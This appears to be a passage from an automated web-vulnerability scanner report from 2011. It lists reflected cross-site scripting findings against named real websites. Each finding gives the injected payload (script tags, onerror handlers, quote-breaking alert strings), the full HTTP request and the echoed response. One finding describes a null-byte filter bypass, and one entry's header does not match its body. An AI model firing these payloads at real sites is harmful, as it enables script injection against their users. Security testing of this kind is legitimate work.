User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:24:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:24:09 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-includes/js/jquery8a3f9\'><script>alert(1)</script>d614a331f52/jquery.js' hreflang='en' >
...[SNIP]...

5.325. http://www.davidpoll.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidpoll.com
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50915'><script>alert(1)</script>7ada97d6528 was submitted in the REST URL parameter 4. This input was echoed as 50915\'><script>alert(1)</script>7ada97d6528 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/jquery.js50915'><script>alert(1)</script>7ada97d6528 HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=136124068.1296350336.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; PHPSESSID=0327f22e76c677f66a17b5702dd9d632; __utma=136124068.1574482894.1296350336.1296350336.1296350336.1; __utmc=136124068; __utmb=136124068.1.10.1296350336;

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:24:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.davidpoll.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 30 Jan 2011 01:24:25 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-equiv
...[SNIP]...
<a id='flag_en' href='http://www.davidpoll.com/wp-includes/js/jquery/jquery.js50915\'><script>alert(1)</script>7ada97d6528' hreflang='en' >
...[SNIP]...

5.326. http://www.foxsportsarizona.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.foxsportsarizona.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27ef4<script>alert(1)</script>3e333fdba2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /27ef4<script>alert(1)</script>3e333fdba2b HTTP/1.1
Host: www.foxsportsarizona.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:24:13 GMT
Connection: close
Content-Length: 766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/27ef4<script>alert(1)</script>3e333fdba2b"</strong>
...[SNIP]...

5.327. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.foxsportsarizona.com
Path:	/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7b076<script>alert(1)</script>2733af53564 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html7b076<script>alert(1)</script>2733af53564 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Date: Sat, 29 Jan 2011 23:54:06 GMT
Content-Length: 832
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html7b076<script>alert(1)</script>2733af53564"</strong>
...[SNIP]...

5.328. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html [blockID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.foxsportsarizona.com
Path:	/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Remediation detail

Request

GET /business-information/--pageid__13823--/global-mktg-index.xhtml?7ffa5"%3balert(1)//4d5eca5bcd1=1 HTTP/1.1
Host: www.hoovers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 30 Jan 2011 01:53:42 GMT
Server: Apache
Cache-Control: no-store, nocache, must-revalidate, private, post-check=0, pre-check=0
Expires: Sat, 26 Jul 1997 05:00:00 GMT
X-Powered-By: PHP/5.2.8
Last-Modified: Sun, 30 Jan 2011 01:53:42 GMT
Pragma: no-cache
Content-Type: text/html
Set-Cookie: HID=173.193.214.243.1296352422574219; path=/; expires=Fri, 29-Jan-16 01:53:42 GMT; domain=.hoovers.com
Set-Cookie: HID=10.1.1.227.151141296352422579; path=/; expires=Fri, 29-Jan-16 01:53:42 GMT; domain=.hoovers.com
Set-Cookie: BIGipServerholpriv-colo1=1342243082.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
Connection: close
Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/
Content-Length: 4106

<!doctype html public "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>We're Sorry</title>
<meta http-equiv="Expires" content="0" />
<meta h
...[SNIP]...
s.prop3=s.getTimeParting('w','-6',2011);
s.channel = "hoovers";
s.server = "hoovers.com";
s.prop4 = "paid";
s.prop8 = "500";
s.prop15 = "/global/mktg/index.xhtml?pageid=13823&7ffa5";alert(1)//4d5eca5bcd1=1";
s.prop49 = "";
s.prop44 = "Registered:Logged In";

buildOmnitureGeneric();
signifyError("500");
</script>
...[SNIP]...

5.331. http://www.linkedin.com/cws/share-count [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.linkedin.com
Path:	/cws/share-count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 98145<img%20src%3da%20onerror%3dalert(1)>ab8a6f417f4 was submitted in the url parameter. This input was echoed as 98145<img src=a onerror=alert(1)>ab8a6f417f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cws/share-count?url=http%3A%2F%2Finformationarbitrage.com%2Fpost%2F3007820135%2Fstart-fund-no-big-deal-business-as-usual98145<img%20src%3da%20onerror%3dalert(1)>ab8a6f417f4 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&d94e49db-3c23-4a26-a29f-2bc2d85c808d"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:4385026427982852534"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:8HtrtVFOqFud1hjpwjpyWjXuFMG2upcnrpWYWInthCyIutxFj3dqg5:1296399980:702de7d65e108e60e7604601831862f69f5f2f9e"; Version=1; Max-Age=1799; Expires=Sun, 30-Jan-2011 15:36:19 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Date: Sun, 30 Jan 2011 15:06:20 GMT
Content-Length: 180

IN.Tags.Share.handleCount({"count":0,"url":"http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual98145<img src=a onerror=alert(1)>ab8a6f417f4"});

5.332. http://www.neudesicmediagroup.com/Advertising.aspx [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.neudesicmediagroup.com
Path:	/Advertising.aspx

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d710"%3balert(1)//68483822cd8 was submitted in the site parameter. This input was echoed as 2d710";alert(1)//68483822cd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Advertising.aspx?site=Silverlight2d710"%3balert(1)//68483822cd8 HTTP/1.1
Host: www.neudesicmediagroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:23:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Cache-Control: private
Set-Cookie: ASP.NET_SessionId=m34i4mxcb24co3masqbyxaxg; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 11128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Contact Us |
...[SNIP]...
industries = [];
                   $('.industry:checked').each(function () {
                       industries.push($(this).val());
                   });

                   $.post("resources/handlers/contact.ashx",
                   {
                       referrer: "Silverlight2d710";alert(1)//68483822cd8",
                       name: $('#name').val(),
                       company: $('#company').val(),
                       email: $('#email').val(),
                       phone: $('#phone').val(),
                       budget: $('#budget').val(),
                       industry: industries.j
...[SNIP]...

5.333. https://www.newsvine.com/_nv/accounts/login [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/login

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aede4"><script>alert(1)</script>23d43ff5841 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_nv/accounts/login?aede4"><script>alert(1)</script>23d43ff5841=1 HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:21:17 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=737406501fadd3f45b7f4acf77a8cd72; expires=Sat, 25-Jan-2031 03:21:17 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<input type="hidden" name="redirect" value="/_nv/accounts/login?aede4"><script>alert(1)</script>23d43ff5841=1" />
...[SNIP]...

5.334. http://www.polls.newsvine.com/_vine/printer [path parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_vine/printer

Issue detail

The value of the path request parameter is copied into the HTML document as plain text between tags. The payload 35aee<img%20src%3da%20onerror%3dalert(1)>16f5f70bd5e was submitted in the path parameter. This input was echoed as 35aee<img src=a onerror=alert(1)>16f5f70bd5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=www&path=/_vine/3c3db971ca91afcd)(sn=*/pierre35aee<img%20src%3da%20onerror%3dalert(1)>16f5f70bd5e HTTP/1.1
Host: www.polls.newsvine.com
Proxy-Connection: keep-alive
Referer: http://www.polls.newsvine.com/_vine/3c3db971ca91afcd)(sn=*/pierre
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 01:35:29 GMT
Connection: close
Content-Length: 523

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.polls.newsvine.com
...[SNIP]...
1,"domainName":null,"displayName":null},"devMachine":false,"section":{"type":"w","contentSetId":"38","domainName":"www","displayName":"www","avatar":null,"path":"\/_vine\/3c3db971ca91afcd)(sn=*\/pierre35aee<img src=a onerror=alert(1)>16f5f70bd5e"},"revision":"23247"}

5.335. http://www.reimage.com/includes/router_land.php [banner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reimage.com
Path:	/includes/router_land.php

Issue detail

The value of the banner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e51e9"><script>alert(1)</script>cee4b8a47b8 was submitted in the banner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /includes/router_land.php?tracking=Neudesic&banner=728x90-1\e51e9"><script>alert(1)</script>cee4b8a47b8 HTTP/1.1
Host: www.reimage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:06 GMT
Server:
Set-Cookie: PHPSESSID=b2q9u49ulbje66brdqd512dqf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _language=english; expires=Wed, 30-Mar-2011 23:29:06 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11300

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="Reimage specializes in 100% Windows OS repair.">
<link href="cs
...[SNIP]...
<img src="/track_new/track.php?tracking=Neudesic&campaign=728x90-1\e51e9"><script>alert(1)</script>cee4b8a47b8&adgroup=direct&ads_name=direct&keyword=direct" width="1" height="1" />
...[SNIP]...

5.336. http://www.reimage.com/includes/router_land.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reimage.com
Path:	/includes/router_land.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ef54"><script>alert(1)</script>298f8ddc1b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /includes/router_land.php?tracking=Neudesic&banner=728x9/4ef54"><script>alert(1)</script>298f8ddc1b00-1\ HTTP/1.1
Host: www.reimage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:08 GMT
Server:
Set-Cookie: PHPSESSID=a8u9t37rrk5v7gi6k9c56rhjg2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _language=english; expires=Wed, 30-Mar-2011 23:29:08 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11301

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="Reimage specializes in 100% Windows OS repair.">
<link href="cs
...[SNIP]...
<img src="/track_new/track.php?tracking=Neudesic&campaign=728x9/4ef54"><script>alert(1)</script>298f8ddc1b00-1\&adgroup=direct&ads_name=direct&keyword=direct" width="1" height="1" />
...[SNIP]...

5.337. http://www.reimage.com/includes/router_land.php [tracking parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reimage.com
Path:	/includes/router_land.php

Issue detail

The value of the tracking request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69f18"><script>alert(1)</script>602f708c63d was submitted in the tracking parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /includes/router_land.php?tracking=Neudesic69f18"><script>alert(1)</script>602f708c63d&banner=728x90-1\ HTTP/1.1
Host: www.reimage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:05 GMT
Server:
Set-Cookie: PHPSESSID=c3crq8h6ge3n955pop0jkt83l2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _language=english; expires=Wed, 30-Mar-2011 23:29:05 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11300

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="description" content="Reimage specializes in 100% Windows OS repair.">
<link href="cs
...[SNIP]...
<img src="/track_new/track.php?tracking=Neudesic69f18"><script>alert(1)</script>602f708c63d&campaign=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct" width="1" height="1" />
...[SNIP]...

5.338. http://www.scientificamerican.com/blog/observations/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.scientificamerican.com
Path:	/blog/observations/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9edcb"><a>429173c9aec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blog/observations/?9edcb"><a>429173c9aec=1 HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=155211566;expires=Tue, 22-Jan-2041 03:19:05 GMT;path=/
Set-Cookie: CFTOKEN=70876219;expires=Tue, 22-Jan-2041 03:19:05 GMT;path=/
Set-Cookie: SSCIAMUSER=;path=/
Set-Cookie: CFID=155211566;path=/
Set-Cookie: CFTOKEN=70876219;path=/
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23;expires=Tue, 22-Jan-2041 03:19:05 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 70062
Date: Sun, 30 Jan 2011 03:19:05 GMT
X-Varnish: 1915411487
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
   
   <title>Observations: Scientific American Blogs</title>
   <meta charset="utf-8" />
   <meta name="description" content="" />
   <met
...[SNIP]...
<input type="hidden" name="url" value="http://www.scientificamerican.com/blog/observations/index.cfm?9edcb"><a>429173c9aec=1" />
...[SNIP]...

5.339. http://www.scout.com/a.z [blipid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.scout.com
Path:	/a.z

Issue detail

The value of the blipid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 38e68(a)38972b8eede was submitted in the blipid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /a.z?s=143&p=3&blipid=1456838e68(a)38972b8eede HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sun, 30 Jan 2011 01:27:20 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:37:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 14 ms
Vary: Accept-Encoding
Content-Length: 2434

<!--
ERROR in function:    "Page_Init()"
- Local date/time :    Saturday, January 29, 2011 5:27:20 PM
- Source :        System.Data
- Message :        Failed to convert parameter value from a String to a Int32.
- message :        undefined
- Number :        0
- Description :        undefined
- description :        undefined
- URL:        s=143&p=3&blipid=1456838e68(a)38972b8eede
- Remote IP :        192.168.10.129
- Referrer URL :
- Server IP:        192.168.20.77, SPRUCE
- MachineName:        SPRUCE
- Stack Trace:
at System.Data.SqlClient.SqlParameter.CoerceValue(Object v
...[SNIP]...

5.340. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.tigerdirect.com
Path:	/applications/SearchTools/item-details.asp

Issue detail

The value of the EdpNo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003cb51"><a>6308be81e2 was submitted in the EdpNo parameter. This input was echoed as 3cb51"><a>6308be81e2 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /applications/SearchTools/item-details.asp?EdpNo=6532393%003cb51"><a>6308be81e2 HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIA05A
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 30 Jan 2011 02:04:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=51; path=/
Set-Cookie: SRVR=WEBX12%2D05A; path=/
Set-Cookie: Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp%3FEdpNo%3D6532393%25003cb51%22%3E%3Ca%3E6308be81e2&Referer=; path=/
Set-Cookie: SessionId=3041425620110129210416173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
Set-Cookie: SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
Set-Cookie: SSLB=0; path=/; domain=.tigerdirect.com
Content-Length: 177793




<input type="hidden" name="hPayMthdBB" value="False" />
<SCRIPT LANGUAGE="javascript">
popWinGen = "";
function loadWindowGen(newTarget, newWidth, n
...[SNIP]...
<input type="hidden" name="url" value="http://www.tigerdirect.com/applications/SearchTools/item-details.asp?page=ty&EdpNo=6532393%003cb51"><a>6308be81e2">
...[SNIP]...

5.341. http://www.tigerdirect.com/applications/SearchTools/item-details.asp [EdpNo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.tigerdirect.com
Path:	/applications/SearchTools/item-details.asp

Issue detail

The value of the EdpNo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ac78'%3balert(1)//e5661d759a9 was submitted in the EdpNo parameter. This input was echoed as 2ac78';alert(1)//e5661d759a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

